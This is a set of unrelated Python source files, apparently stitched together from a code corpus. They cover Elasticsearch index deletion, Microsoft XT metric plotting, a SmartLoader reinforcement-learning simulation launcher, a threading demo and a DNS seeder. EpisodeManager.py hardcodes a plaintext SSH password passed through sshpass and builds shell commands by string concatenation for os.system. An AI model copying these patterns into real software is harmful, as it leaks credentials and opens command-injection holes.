filter_indices = [s for s in indices_list if re.search(r"^\d+_\w+_\d{8,}$", s[INDEX]) is not None]
range_index = len(filter_indices) if limit > len(filter_indices) else limit
result[TOP] = [filter_indices[i][INDEX] for i in range(range_index)]
return result
else:
logger.warning(f"{es_addr}: cat indices request failed. {res.status_code} {res.text}")
raise EsRestRequestError(message_kv={"msg": res.text})
def del_indices(cluster_name, indices):
"""
:param cluster_name: 集群名称
:param indices: 索引列表,支持通配符
"""
es_addr, es_auth = es_conn_info(cluster_name)
index_list = indices.split(",")
error_list = []
success_list = []
for index in index_list:
url = f"http://{es_addr}/{index}?master_timeout=300s"
try:
res = requests.delete(url=url, auth=es_auth, timeout=HTTP_REQUEST_TIMEOUT)
logger.info(f"del indices request, url: {url}, status: {res.status_code}")
if res.status_code == 200:
success_list.append(index)
else:
logger.error(f"{es_addr}: {index}: failed to del indices for {res.text}")
error_list.append(index)
except Exception:
error_list.append(index)
logger.error(f"{es_addr}: {index}: del indices exception.", exc_info=True)
return {SUCCESS: success_list, FAILED: error_list}
def es_conn_info(cluster_name):
"""
获取es连接信息
:param cluster_name: 集群名称
"""
cluster = model_manager.get_cluster_obj_by_name_type(cluster_name, ES)
if not cluster:
raise ClusterNotFoundException(message_kv={CLUSTER_TYPE: ES, CLUSTER_NAME: cluster_name})
es_addr, es_auth = parse_es_connection_info(cluster.connection_info)
return es_addr, es_auth
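# Illustrative usage sketch (added, not part of the original module). A typical lifecycle, assuming
# rt_info is the dict returned by util.get_rt_info() for a result table with ES storage configured:
#
#   rt_info = util.get_rt_info("591_etl_abc")
#   initialize(rt_info)   # create the first index and alias
#   info(rt_info)         # inspect indices, mappings, settings and sample data
#   maintain(rt_info)     # rotate/split indices and refresh aliases (also run by maintain_all_rts())
#   delete(rt_info)       # drop all indices of the rt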
|
plot_builder.py
|
#
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
#
# plot_builder.py: functions to help produce plots of metrics from runs
import math
import time
import numpy as np
import pandas as pd
from xtlib import qfe
from xtlib import utils
from xtlib import errors
from xtlib import console
from xtlib import constants
from xtlib import run_helper
PRESMOOTH = "_PRE-SMOOTH_"
ERR = "_ERR_"
MEAN = "_MEAN_"
MIN = "_MIN_"
MAX = "_MAX_"
class PlotBuilder():
def __init__(self, run_names, col_names, x_col, layout, break_on, title, show_legend, plot_titles,
legend_titles, smoothing_factor, plot_type, timeout,
aggregate, shadow_type, shadow_alpha, run_log_records, style, show_toolbar, max_runs, max_traces,
group_by, error_bars, show_plot, save_to, x_label, colors, color_map, color_steps, legend_args, plot_args):
self.run_names = run_names
self.col_names = col_names
self.x_col = x_col
self.layout = layout
self.break_on = break_on
self.title = title
self.show_legend = show_legend
self.plot_titles = plot_titles
self.legend_titles = legend_titles
self.smoothing_factor = smoothing_factor
self.plot_type = plot_type
self.timeout = timeout
self.aggregate = utils.zap_none(aggregate)
self.shadow_type = utils.zap_none(shadow_type)
self.shadow_alpha = shadow_alpha
self.run_log_records = run_log_records
self.style = utils.zap_none(style)
self.show_toolbar = show_toolbar
self.max_runs = max_runs
self.max_traces = max_traces
self.group_by = group_by if group_by else "run"
self.error_bars = utils.zap_none(error_bars)
self.show_plot = show_plot
self.save_to = save_to
self.x_label = x_label
self.legend_args = legend_args
self.plot_args = plot_args
if colors:
self.colors = colors
else:
if not color_map:
color_map = "cycle"
self.colors = self.get_colors(color_map, color_steps)
def get_colors(self, color_map_name, steps):
from matplotlib import cm
if color_map_name == "cycle":
            # matplotlib default colors (v2.0, category10 color palette)
colors = \
['#1f77b4', '#ff7f0e', '#2ca02c', '#d62728',
'#9467bd', '#8c564b', '#e377c2', '#7f7f7f',
'#bcbd22', '#17becf']
else:
color_map = cm.get_cmap(color_map_name)
colors = color_map( np.linspace(0, 1, steps) )
return colors
def build(self):
data_frames_by_cols = self.build_data_frames()
if data_frames_by_cols:
for cols, dfx in data_frames_by_cols.items():
dfx = self.pre_preprocess_data_frame(dfx)
data_frames_by_cols[cols] = dfx
# this check is to enable faster testing
if self.show_plot or self.save_to:
self.plot_data(data_frames_by_cols)
def build_data_frames(self):
'''
1. for each run, collect the reported metrics as metric sets (by reported col list)
2. append to the dataframe for that col list
'''
# build "data_frames"
no_metrics = []
pp_run_names = []
used_max = False
data_frames_by_cols = {}
got_columns = False
for i, record in enumerate(self.run_log_records):
# extract metrics for this run
run = record["_id"]
node = utils.node_id(record["node_index"])
job = record["job_id"]
experiment = record["exper_name"]
workspace = record["ws"]
search_style = utils.safe_value(record, "search_style")
if search_style and search_style != "single":
# parent run with children - skip it
continue
log_records = record["log_records"]
metric_sets = run_helper.build_metrics_sets(log_records)
if not metric_sets:
no_metrics.append(run)
continue
if self.max_runs and len(pp_run_names) >= self.max_runs:
used_max = True
break
if not got_columns:
# set x and y columns
explicit = qfe.get_explicit_options()
if not "x" in explicit:
self.x_col = self.get_actual_x_column(metric_sets, self.x_col, self.col_names)
if not self.col_names:
# not specified by user, so build defaults
self.col_names = self.get_default_y_columns(metric_sets, self.x_col)
got_columns = True
# merge metric sets into dfx
for metric_set in metric_sets:
# create a pandas DataFrame
df = pd.DataFrame(metric_set["records"])
cols = str(list(df.columns))
# ensure this df has our x_col
if self.x_col and not self.x_col in cols:
continue
# ensure this df has at least 1 y_col
found_y = False
for y in self.col_names:
if y in cols:
found_y = True
break
if not found_y:
continue
# add run_name column
df["run"] = [run] * df.shape[0]
df["node"] = [node] * df.shape[0]
df["job"] = [job] * df.shape[0]
df["experiment"] = [experiment] * df.shape[0]
df["workspace"] = [workspace] * df.shape[0]
if not cols in data_frames_by_cols:
data_frames_by_cols[cols] = df
else:
dfx = data_frames_by_cols[cols]
dfx = dfx.append(df)
data_frames_by_cols[cols] = dfx
pp_run_names.append(run)
if no_metrics:
console.print("\nnote: following runs were skipped (currently have no logged metrics): \n {}\n".format(", ".join(no_metrics)))
if used_max:
console.print("plotting first {} runs (use --max-runs to override)".format(self.max_runs))
else:
console.print("plotting {} runs...".format(len(pp_run_names)))
        # update our list of run_names to process
self.run_names = pp_run_names
return data_frames_by_cols
def get_agg_df(self, df, agg_op, df_cols):
agg_dict = {}
for col in self.col_names:
if col in df_cols:
agg_dict[col] = agg_op
df_out = df.agg(agg_dict)
#df3 = df2.fillna(method='ffill')
df_out = df_out.reset_index()
return df_out
def pre_preprocess_data_frame(self, dfx):
'''
        apply pre-processing operations to the specified data frame:
- data frame most likely will NOT contain all y cols
- optionally smooth the Y-axis cols
- optionally create aggregate VALUE Y-axis cols
        - optionally create aggregate SHADOW Y-axis cols
'''
if self.smoothing_factor:
# SMOOTH each column of values
for col in self.col_names:
if col in dfx.columns:
self.apply_smooth_factor(dfx, col, self.smoothing_factor)
# get a copy of columns before group-by
dfx_pre = dfx
df_cols = list(dfx.columns)
if self.aggregate:
            # specifying an aggregate hides the other runs' values (for now)
if self.group_by:
# GROUP data
group_col = self.group_by
group_prefix = "node" if self.group_by == "node_index" else ""
x_col = self.x_col
dfx = dfx.groupby([group_col, x_col])
# AGGREGATE data
df_agg_from = dfx
dfx = self.get_agg_df(df_agg_from, self.aggregate, df_cols)
# ERROR BARS data
if self.error_bars:
dfx = self.build_agg_stat(df_agg_from, self.error_bars, df_cols, dfx)
# SHADOW TYPE BARS data
if self.shadow_type == "min-max":
dfx = self.build_agg_stat(df_agg_from, "min", df_cols, dfx)
dfx = self.build_agg_stat(df_agg_from, "max", df_cols, dfx)
elif self.shadow_type and self.shadow_type != "pre-smooth":
dfx = self.build_agg_stat(df_agg_from, "mean", df_cols, dfx)
dfx = self.build_agg_stat(df_agg_from, self.shadow_type, df_cols, dfx)
# if self.shadow_type:
# self.run_names.append(self.shadow_type)
# min_values, max_values = self.range_runs(runs_dict, self.shadow_type)
# runs_dict[self.shadow_type] = (min_values, max_values)
return dfx
def build_agg_stat(self, df_agg_from, stat, df_cols, dfx):
df_stat = self.get_agg_df(df_agg_from, stat, df_cols)
stat_name = "_{}_".format(stat.upper())
for col in self.col_names:
if col in df_stat.columns:
# extract stat data for col
stat_data = df_stat[col]
# add col data as new name to dfx
dfx[col + stat_name] = stat_data
return dfx
def apply_smooth_factor(self, data_frame, col, weight):
presmooth_values = list(data_frame[col])
smooth_values = self.apply_smooth_factor_core(presmooth_values, weight)
data_frame[col] = smooth_values
data_frame[col + PRESMOOTH] = presmooth_values
def apply_smooth_factor_core(self, values, weight):
smooth_values = []
if values:
prev = values[0]
for value in values:
smooth = weight*prev + (1-weight)*value
smooth_values.append(smooth)
prev = smooth
return smooth_values
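    # Illustrative example (added): apply_smooth_factor_core([0, 10, 20], 0.5) computes an exponential
    # moving average seeded with the first value: 0.5*0 + 0.5*0 = 0, then 0.5*0 + 0.5*10 = 5.0,
    # then 0.5*5 + 0.5*20 = 12.5, returning [0, 5.0, 12.5].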
def calc_actual_layout(self, count, layout):
if not "x" in layout:
errors.syntax_error("layout string must be of form RxC (R=# rows, C=# cols)")
r,c = layout.split("x", 1)
if r:
r = int(r)
c = int(c) if c else math.ceil(count / r)
elif c:
c = int(c)
r = int(r) if r else math.ceil(count / c)
full_count = r*c
if full_count < count:
errors.combo_error("too many plots ({}) for layout cells ({})".format(count, full_count))
return r, c
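    # Illustrative example (added): calc_actual_layout(5, "2x") returns (2, 3) -- 2 rows are requested,
    # so 3 columns are needed to fit 5 plots; calc_actual_layout(5, "x2") returns (3, 2).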
def get_xy_values(self, data_frames_by_cols, group_name, x_col, y_col, stat_col):
x_values = None
y_values = None
stat_values = None
'''
Note: a specific y_col could exist in different data_frames, depending
        on the other columns logged with it during each run. So, don't stop
searching on the first match with y_col - keep going until we get a
matching set of group_name records also.
'''
for cols, df in data_frames_by_cols.items():
if y_col in df.columns:
# filter values for specified run name
df = df[ df[self.group_by]==group_name ]
record_count = len(df.index)
if record_count:
y_values = df[ y_col ].to_numpy(dtype=float)
if x_col and x_col in df.columns:
x_values = df[ x_col ].to_numpy(dtype=float)
if stat_col and stat_col in df.columns:
stat_values = df[ stat_col ].to_numpy(dtype=float)
break
return x_values, y_values, stat_values
def plot_data(self, data_frames_by_cols):
console.diag("starting to plot data")
# on-demand import for faster XT loading
import seaborn as sns
import matplotlib.pyplot as plt
import matplotlib as mpl
import pylab
if not self.show_toolbar:
# hide the ugly toolbar at bottom left of plot window
mpl.rcParams['toolbar'] = 'None'
# apply seaborn styling
if self.style:
sns.set_style(self.style)
# decide how layout, titles, etc. will be set
group_names = set()
# gather group names (usually all are in the first dataset, but not always)
for dfx in data_frames_by_cols.values():
name_list = dfx[self.group_by].unique()
group_names.update(set(name_list))
group_names = list(group_names)
# this will sort the group names in a number-smart way
group_names.sort(key=utils.natural_keys)
group_count = len(group_names)
col_count = len(self.col_names)
break_on_groups = self.break_on and ("run" in self.break_on or "group" in self.break_on)
break_on_cols = self.break_on and "col" in self.break_on
if break_on_groups and break_on_cols:
plot_count = group_count*col_count
elif break_on_groups:
plot_count = group_count
elif break_on_cols:
plot_count = col_count
else:
plot_count = 1
# calc true layout
if self.layout:
plot_rows, plot_cols = self.calc_actual_layout(plot_count, self.layout)
else:
plot_cols = plot_count
plot_rows = 1
runs_per_plot = 1 if break_on_groups else group_count
cols_per_plot = 1 if break_on_cols else col_count
if runs_per_plot == 1:
plot_title = "$run"
legend_text = "$col"
elif cols_per_plot == 1:
plot_title = "$col"
legend_text = "$run"
else:
plot_title = None
legend_text = "$col ($run)"
if not self.plot_titles and plot_title:
self.plot_titles = [plot_title]
if not self.legend_titles:
self.legend_titles = [legend_text]
# configure matplotlib for our subplots
sharex = True
sharey = True
#plt.close()
window_size = (14, 6)
fig, plots = plt.subplots(plot_rows, plot_cols, figsize=window_size, sharex=sharex, sharey=sharey, constrained_layout=True)
if not isinstance(plots, np.ndarray):
# make it consistent with plot_count > 1 plots
plots = [plots]
elif plot_rows > 1:
plots = plots.flatten()
fig.suptitle(self.title, fontsize=16)
if self.timeout:
# build a thread to close our plot window after specified time
from threading import Thread
def set_timer(timeout):
console.print("set_timer called: timeout=", self.timeout)
time.sleep(self.timeout)
console.diag("timer triggered!")
plt.close("all")
print("closed all plots and the fig")
thread = Thread(target=set_timer, args=[self.timeout])
thread.daemon = True # mark as background thread
thread.start()
line_index = 0
plot_index = 0
trace_count = 0
x_label = self.x_label if self.x_label else self.x_col
if self.aggregate == "none":
self.aggregate = None
if (self.aggregate and (break_on_cols and not break_on_groups)) \
or ((not self.aggregate) and break_on_cols):
# columns needs to be the outer loop
for c, col in enumerate(self.col_names):
if trace_count >= self.max_traces:
break
if c and break_on_cols:
plot_index += 1
line_index = 0
for r, group_name in enumerate(group_names):
if trace_count >= self.max_traces:
break
if r and break_on_groups:
plot_index += 1
line_index = 0
# PLOT MIDDLE
ax = plots[plot_index] # .gca()
self.plot_middle(data_frames_by_cols, ax, group_name, col, self.x_col, x_label, line_index)
line_index += 1
trace_count += 1
else:
# run will work as the outer loop
for r, group_name in enumerate(group_names):
if trace_count >= self.max_traces:
break
if r and break_on_groups:
plot_index += 1
line_index = 0
for c, col in enumerate(self.col_names):
if trace_count >= self.max_traces:
break
if c and break_on_cols:
plot_index += 1
line_index = 0
# PLOT MIDDLE
ax = plots[plot_index] #.gca()
self.plot_middle(data_frames_by_cols, ax, group_name, col, self.x_col, x_label, line_index)
line_index += 1
trace_count += 1
if self.save_to:
plt.savefig(self.save_to)
if self.show_plot:
pylab.show()
def get_seaborn_color_map(self, name, n_colors=5):
'''
name: muted, xxx
'''
import seaborn as sns
from matplotlib.colors import ListedColormap
# Construct the colormap
current_palette = sns.color_palette(name, n_colors=n_colors)
cmap = ListedColormap(sns.color_palette(current_palette).as_hex())
return cmap
def plot_middle(self, data_frames_by_cols, ax, group_name, col, x_col, x_label, line_index):
color_index = line_index % len(self.colors)
color = self.colors[color_index]
if self.shadow_type == "pre-smooth":
# draw PRESMOOTH SHADOW
x, y, _ = self.get_xy_values(data_frames_by_cols, group_name, self.x_col, col + PRESMOOTH, None)
self.plot_inner(ax, group_name, col, self.x_col, x_label, line_index, x_values=x, y_values=y,
color=color, alpha=self.shadow_alpha, use_y_label=False)
elif self.shadow_type:
if self.shadow_type == "min-max":
x, y, _ = self.get_xy_values(data_frames_by_cols, group_name, self.x_col, col + MIN, None)
x2, y2, _ = self.get_xy_values(data_frames_by_cols, group_name, self.x_col, col + MAX, None)
else:
# draw RANGE SHADOW
stat_name = "_{}_".format(self.shadow_type.upper())
x, y_mean, _ = self.get_xy_values(data_frames_by_cols, group_name, self.x_col, col + MEAN, None)
x, y_stat, _ = self.get_xy_values(data_frames_by_cols, group_name, self.x_col, col + stat_name, None)
y = y_mean - y_stat
y2 = y_mean + y_stat
self.plot_inner(ax, group_name, col, self.x_col, x_label, line_index, x_values=x, y_values=y,
color=color, alpha=self.shadow_alpha, use_y_label=False, y2_values=y2)
# DRAW NORMAL LINE
err_col = col + "_{}_".format(self.error_bars.upper()) if self.error_bars else None
x, y, err = self.get_xy_values(data_frames_by_cols, group_name, self.x_col, col, err_col)
self.plot_inner(ax, group_name, col, self.x_col, x_label, line_index, x_values=x, y_values=y,
color=color, alpha=1, use_y_label=True, err_values=err)
def plot_inner(self, ax, run_name, col, x_col, x_label, line_index, x_values, y_values,
color, alpha, use_y_label, y2_values=None, err_values=None):
import seaborn as sns
from matplotlib.ticker import MaxNLocator
if x_values is None:
x_values = range(len(y_values))
else:
ax.set_xlabel(x_label)
console.detail("x_values=", x_values)
console.detail("y_values=", y_values)
console.detail("y2_values=", y2_values)
num_y_ticks = 10
ax.get_yaxis().set_major_locator(MaxNLocator(num_y_ticks))
#color = self.colors[line_index % len(self.colors)]
if use_y_label:
line_title = self.legend_titles[line_index % len(self.legend_titles)]
line_title = self.fixup_text(line_title, run_name, col)
else:
line_title = None
cap_size = 5
is_range_plot = bool(y2_values is not None)
# our default attributes
kwargs = {"label": line_title, "color": color, "alpha": alpha}
if not is_range_plot:
kwargs["capsize"] = cap_size
# let user override
if self.plot_args and not is_range_plot:
for name, value in self.plot_args.items():
value = utils.make_numeric_if_possible(value)
kwargs[name] = value
#cmap = self.get_seaborn_color_map("muted")
if self.plot_type == "line":
if is_range_plot:
# RANGE plot
ax.fill_between(x_values, y_values, y2_values, **kwargs)
elif x_values is not None:
# X/Y LINE plot
trace = ax.errorbar(x_values, y_values, yerr=err_values, **kwargs)
else:
# LINE plot
ax.errorbar(y_values, '-', label=line_title, yerr=err_values, **kwargs)
else:
            # for now, we can get lots of mileage out of line plot (errorbars, scatter, scatter+line)
# so keep things simple and just support 1 type well
errors.syntax_error("unknown plot type={}".format(self.plot_type))
if self.plot_titles:
plot_title = self.plot_titles[line_index % len(self.plot_titles)]
plot_title = self.fixup_text(plot_title, run_name, col)
ax.set_title(plot_title)
if self.show_legend:
ax.legend()
if self.legend_args:
# pass legend args to legend object
ax.legend(**self.legend_args)
def fixup_text(self, text, run_name, col):
text = text.replace("$run", run_name)
text = text.replace("$col", col)
return text
def get_actual_x_column(self, metric_sets, default_x_col, y_cols):
'''
x col search order:
        - specified on the command line (explicit_options, checked by caller)
        - specified as 'step_name' in logged metrics (matching y_cols)
        - specified as 'step_name' in first logged metrics (if no y_cols specified)
        - config file step_name property
        - guess from a list of commonly used names
'''
x_col = None
first_y = y_cols[0] if y_cols else None
for ms in metric_sets:
keys = ms["keys"]
if first_y and not first_y in keys:
continue
if constants.STEP_NAME in keys:
records = ms["records"]
x_col = records[0][constants.STEP_NAME]
elif default_x_col:
x_col = default_x_col
else:
# try guessing from common names (and __index__, sometimes added by XT)
x_names = ["epoch", "step", "iter", "epochs", "steps", "iters", constants.INDEX]
for xn in x_names:
if xn in keys:
x_col = xn
break
# only look in first metric set
break
return x_col
def get_default_y_columns(self, metric_sets, x_col):
y_cols = []
for ms in metric_sets:
keys = ms["keys"]
omits = [x_col, constants.STEP_NAME, constants.TIME]
for key in keys:
if not key in omits:
y_cols.append(key)
# only look in first metric set
break
return y_cols
def range_runs(self, runs_dict, range):
runs = list(runs_dict.values())
if range == "min-max":
min_values = np.min(runs, axis=0)
max_values = np.max(runs, axis=0)
elif range == "std":
means = np.mean(runs, axis=0)
max_values = means + np.std(runs, axis=0)
min_values = means - np.std(runs, axis=0)
elif range == "error":
from scipy import stats
means = np.mean(runs, axis=0)
max_values = means + stats.sem(runs, axis=0)
min_values = means - stats.sem(runs, axis=0)
else:
errors.syntax_error("unrecognized range value: {}".format(range))
return min_values, max_values
def get_values_by_run(self, col, run_log_records):
runs_dict = {}
for rr in run_log_records:
run_name = rr["_id"]
value_recs = rr["metrics"]["records"]
new_values = [vr[col] for vr in value_recs]
runs_dict[run_name] = new_values
return runs_dict
|
EpisodeManager.py
|
#!/usr/bin/env python3
#
# This file includes mainly a class "EpisodeManager" and some utility function called get_ip
# Author: Michele
# Project: SmartLoader - Innovation
#
# For now, hard coded:
# sim_host="192.168.100.21"
# sim_port= 22
# scenario_file="/home/sload/InitialScene.json"
# oururl_file = "/home/sload/URLConfig.json"
# destination_scenario="./UnityBuild/smartloader/smartloader_Data/StreamingAssets/InitialScene.json"
# destination_url="./UnityBuild/smartloader/smartloader_Data/StreamingAssets/URLConfig.json"
# # run_simulation_cmd="./UnityBuild/smartloader/smartloader.exe"
# run_simulation_cmd="c:/Pstools/psexec /accepteula -i 1 -d c:/users/gameuser/UnityBuild/smartloader/smartloader.exe"
# kill_simulation_cmd="c:/Pstools/psexec /accepteula -i 1 -d taskkill /F /IM smartloader.exe"
import sys, os, time
import os.path
import re
from shutil import copyfile
import logging
import multiprocessing as mp
from multiprocessing import Process, Queue
from paramiko import SSHClient, AuthenticationException, SSHException, BadHostKeyException
from scp import SCPClient
import socket
import json
from src.DrawingEpisodes import randomEpisode, MultipleRocksEpisode
### The goal of this function is to determine the IP address of the computer running this module.
### Knowing the IP address makes it possible to configure URLConfig.json for the simulation without human intervention
def get_ip():
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
# doesn't even have to be reachable
s.connect(('10.255.255.255', 1))
IP = s.getsockname()[0]
except:
IP = '127.0.0.1'
finally:
s.close()
return IP
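# Note (added): connect() on a UDP socket never sends a packet; it only asks the OS
# which local interface would be used to reach that address, so 10.255.255.255 does
# not need to be reachable. A minimal usage sketch, mirroring how __init__ below
# builds the websocket URL (port 9090 is taken from that code):
def example_build_ws_url(port=9090):
    return "ws://{}:{}".format(get_ip(), port)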
# The class EpisodeManager deals with everything that has to do with an episode for training an agent with RL.
# It is compliant with gym methodology.
# What should be called:
# episode = EpisodeManager()
# episode.generateAndRunWholeEpisode()
# episode.killSimulation()
# Note that if you want to run the same episode each time, you should call:
# episode.runEpisode()
#
#
class EpisodeManager:
local = False
scenario = {}
scenarioConfigFile = open("InitialScene.json", 'wt')
sim_host="192.168.100.21"
sim_port= 22
scenario_file="/home/sload/InitialScene.json"
oururl_file = "/home/sload/URLConfig.json"
destination_scenario="./UnityBuild/smartloader/smartloader_Data/StreamingAssets/InitialScene.json"
destination_url="./UnityBuild/smartloader/smartloader_Data/StreamingAssets/URLConfig.json"
# run_simulation_cmd="./UnityBuild/smartloader/smartloader.exe"
run_simulation_cmd="c:/Pstools/psexec /accepteula -i 1 -d c:/users/gameuser/UnityBuild/smartloader/smartloader.exe"
kill_simulation_cmd="c:/Pstools/psexec /accepteula -i 1 -d taskkill /F /IM smartloader.exe"
simProcess = 0
myip = get_ip()
myurl= ""
def generateNewSerieScenario(self, new_seed):
# new_seed=rnd.seed(None,2)
print("start a new serie of scenarios:"+new_seed.__str__())
randomEpisode(new_seed)
def generateNewScenario(self,typeOfRand, numstones, marker):
print("generate new scenario")
if typeOfRand == "verybasic":
path = os.getcwd()
file = path +"/VeryBasicInitialScene.json"
copyfile(file,"InitialScene.json")
elif typeOfRand == "MultipleRocks":
MultipleRocksEpisode(0, numstones, marker)
else:
randomEpisode(typeOfRand, 0)
# This method secure copies a file to a remote computer
def ssh_scp_file(self, ssh_host, ssh_user, ssh_password, ssh_port, source_volume, destination_volume):
logging.info("In ssh_scp_files()method, to copy the files to the server")
if (self.local):
command = "cp " + source_volume + " " + destination_volume
else:
command = "sshpass -p " + ssh_password + " scp "+ source_volume+" " + ssh_user +"@"+ssh_host+":"+destination_volume
print(command)
os.system(command)
# This method encapsulates ssh_scp_files and copies all the files needed via secure cp to the computer that runs Unity
def scpScenarioToSimulation(self):
print("scp to simulation")
# self.ssh_scp_files(self.this_host,"gameuser","PlayMe1", self.this_port, "/home/sload/InitialScene.json", "AAAAA.json")
self.ssh_scp_file(self.sim_host,"gameuser","PlayMe1", self.sim_port, self.scenario_file, self.destination_scenario)
self.ssh_scp_file(self.sim_host,"gameuser","PlayMe1", self.sim_port, self.oururl_file, self.destination_url)
def runSimulation(self):
print("Run Simulation Brutal Force")
if (self.local):
command = self.run_simulation_cmd
else:
command = "sshpass -p PlayMe1 ssh "+self.sim_host+" -l gameuser "+ self.run_simulation_cmd
#command = "sshpass -p PlayMe1 ssh 192.168.100.21 -l gameuser "+ self.run_simulation_cmd
print(command)
os.system(command)
def killSimulation(self):
print("Kill Simulation Brutal Force")
if (self.local):
command = self.kill_simulation_cmd
else:
command = "sshpass -p PlayMe1 ssh "+self.sim_host+" -l gameuser "+ self.kill_simulation_cmd
# command = "sshpass -p PlayMe1 ssh 192.168.100.21 -l gameuser "+ self.kill_simulation_cmd
print(command)
os.system(command)
def runEpisode(self):
if self.simProcess != 0:
print("Simulation is already running... wait few minutes and try again")
return
# self.scpScenarioToSimulation()
try:
# pass the bound method itself; calling it here would block and hand Process a None target
self.simProcess = mp.Process(target=self.runSimulation)
self.simProcess.start()
except:
time.sleep(1)
# self.generateAndRunWholeEpisode("verybasic")
def generateAndRunWholeEpisode(self, typeOfRand, numstones=0, marker=None):
if self.simProcess != 0:
print("Simulation is already running... wait a few minutes and try again")
return
self.generateNewScenario(typeOfRand, numstones, marker)
try:
self.scpScenarioToSimulation()
except:
time.sleep(1)
print("Stopped this scenario: try runEpisode")
raise #("Banner")
else:
try:
self.simProcess = mp.Process(target=self.runSimulation)
self.simProcess.start()
except:
time.sleep(1)
print("Stopped this scenario here")
raise #("Banner")
def __init__(self):
# Where are we
mydic = sys.path
mypath = ""
for i in mydic:
if (i.find("simcom")!=-1):
mypath = i
break
if mypath != "":
tlocal = mypath
else:
tlocal = os.getcwd()
print(tlocal)
local = re.sub('/src$', '', tlocal)
configDir = local +"//config"
os.chdir(configDir)
local = os.getcwd()
confFile = configDir+"//config.json"
if (os.path.exists(confFile)):
with open(confFile) as json_file:
data = json.load(json_file)
self.sim_host = data['sim_host']
if (self.sim_host == "127.0.0.1"):
self.local = True
else:
self.local = False
self.sim_port = data['sim_port']
self.scenario_file = configDir+"//"+data['scenario_file']
self.oururl_file = configDir+"//"+data['oururl_file']
self.sim_root = os.getenv('HOME') + '//' + data['sim_root']
if self.local == True:
self.destination_scenario = self.sim_root + "//" + data['destination_scenario']
self.destination_url = self.sim_root + "//" +data['destination_url']
self.run_simulation_cmd = self.sim_root + "//" + data['run_simulation_cmd']
else:
self.destination_scenario = data['destination_scenario']
self.destination_url = data['destination_url']
self.run_simulation_cmd=data['run_simulation_cmd']
self.kill_simulation_cmd = data['kill_simulation_cmd']
#else: works with default
#
# Get the IP address of this machine and throw it in the URLConfig.json file
self.myip = get_ip()
self.myurl = "ws://"+self.myip.__str__()+":9090"
print(self.myurl)
data2 = {}
data2['URL'] = self.myurl
#data['URL'].append(self.myurl)
with open(self.oururl_file, 'w') as outfile:
json.dump(data2, outfile)
if __name__ == '__main__':
episode = EpisodeManager()
#episode.ScpScenarioToSimulation()
mp.set_start_method('fork')
episode.generateAndRunWholeEpisode("recorder")
# sometimerproc = mp.Process(target=episode.killSimulation())
# print("I am after calling to kill")
# episode.simProcess = mp.Process(target=episode.runSimulation())
# sometimerproc.start()
print("I am before start")
# episode.simProcess.start()
print("I am here")
time.sleep(60)
print("I am here-here")
episode.killSimulation()
print("I am here-here-here")
|
main.py
|
#!/usr/bin/env python3
#
# https://docs.python.org/3/library/threading.html
#
import threading
import time
# --- classes ---
class ExampleThread(threading.Thread):
def __init__(self, name, counter=10, sleep=0.5):
threading.Thread.__init__(self)
self.name = name
self.counter = counter
self.sleep = sleep
def run(self):
for x in range(self.counter):
print(self.name, x)
time.sleep(self.sleep)
# --- functions ---
def example_function(name, counter=10, sleep=0.5):
for x in range(counter):
print(name, x)
time.sleep(sleep)
# --- example 1 ---
# `args` has to be a tuple.
# for one argument you need `args=("function:",)`
t1 = threading.Thread(target=example_function, args=("function:", 15))
t1.start()
# --- example 2 ---
t2 = ExampleThread("class:", 10, 1.0)
t2.start()
# --- example 3 ---
# start thread after 3 seconds
t3 = threading.Timer(3, example_function, args=("** timer **:", 2, 3.0))
t3.start()
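# Optional follow-up (added as a sketch): wait for all three to finish before the
# script exits. Timer is itself a Thread, so it can be joined the same way.
t1.join()
t2.join()
t3.join()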
|
dns_server.py
|
#!/usr/bin/env python
# coding=utf-8
from mn_rand_ips import MNRandIPs
import argparse
import datetime
import sys
import time
import threading
import traceback
import SocketServer
import struct
import logging
try:
from dnslib import *
except ImportError:
logging.error("Missing dependency dnslib: <https://pypi.python.org/pypi/dnslib>. Please install it with `pip`.")
sys.exit(2)
logging.basicConfig(filename='/home/ubuntu/seeder.log', level=logging.DEBUG)
class DomainName(str):
def __getattr__(self, item):
return DomainName(item + '.' + self)
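# Illustrative check (added, not in the original): attribute access on DomainName
# builds fully qualified names, which is how D.ns1, D.ns2 and D.mail below expand.
assert DomainName("example.org").ns1 == "ns1.example.org"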
DOMAN_NAME = 'dnsseed1.innoket.org'
IP = '127.0.0.1'
NS = "ns1.innoket.org"
D = DomainName(DOMAN_NAME)
TTL = 60 * 5
soa_record = SOA(
mname=D.ns1, # primary name server
rname=D.chcdev,
times=(
201307231, # serial number
60 * 60 * 1, # refresh
60 * 60 * 3, # retry
60 * 60 * 24, # expire
60 * 60 * 1, # minimum
)
)
ns_records = [NS(D.ns1), NS(D.ns2)]
records = {
D: [A(IP), AAAA((0,) * 16), MX(D.mail), soa_record] + ns_records,
D.ns1: [A(IP)], # MX and NS records must never point to a CNAME alias (RFC 2181 section 10.3)
D.ns2: [A(IP)],
D.mail: [A(IP)],
D.andrei: [CNAME(D)],
}
mn_rand_ips = MNRandIPs()
mn_rand_ips.refresh_mn_ips()
ips_per_req = 8
_NS_RECORD = "NS"
def dns_response(data):
request = DNSRecord.parse(data)
logging.info(request)
reply = DNSRecord(DNSHeader(id=request.header.id, qr=1, aa=1, ra=1), q=request.q)
qname = request.q.qname
qn = str(qname)
qtype = request.q.qtype
qt = QTYPE[qtype]
if qt == "NS":
reply.add_answer(*RR.fromZone(DOMAN_NAME + " 3600 NS " + NS))
reply.add_ar(*RR.fromZone(NS + " A " + IP))
else:
domain_name_a = DOMAN_NAME + " A "
for ip in mn_rand_ips.get_random_x_ips( ips_per_req ):
reply.add_answer(*RR.fromZone(domain_name_a + ip))
logging.info("---- Reply: %s\n", str(reply) )
return reply.pack()
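# Hedged sketch (added): a local sanity check that exercises dns_response() without
# touching the network. DNSRecord.question() is the dnslib helper for building a
# query packet; the returned list is whatever A records the seeder handed out.
def _example_local_roundtrip():
    query = DNSRecord.question(DOMAN_NAME)
    reply = DNSRecord.parse(dns_response(query.pack()))
    return [str(rr.rdata) for rr in reply.rr]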
class BaseRequestHandler(SocketServer.BaseRequestHandler):
def get_data(self):
raise NotImplementedError
def send_data(self, data):
raise NotImplementedError
def handle(self):
now = datetime.datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f')
logging.info("\n\n%s request %s (%s %s):" % (self.__class__.__name__[:3], now, self.client_address[0],
self.client_address[1]))
try:
data = self.get_data()
logging.info(str(len(data)) + " : " + str(data) ) # repr(data).replace('\\x', '')[1:-1]
self.send_data(dns_response(data))
except Exception as e:
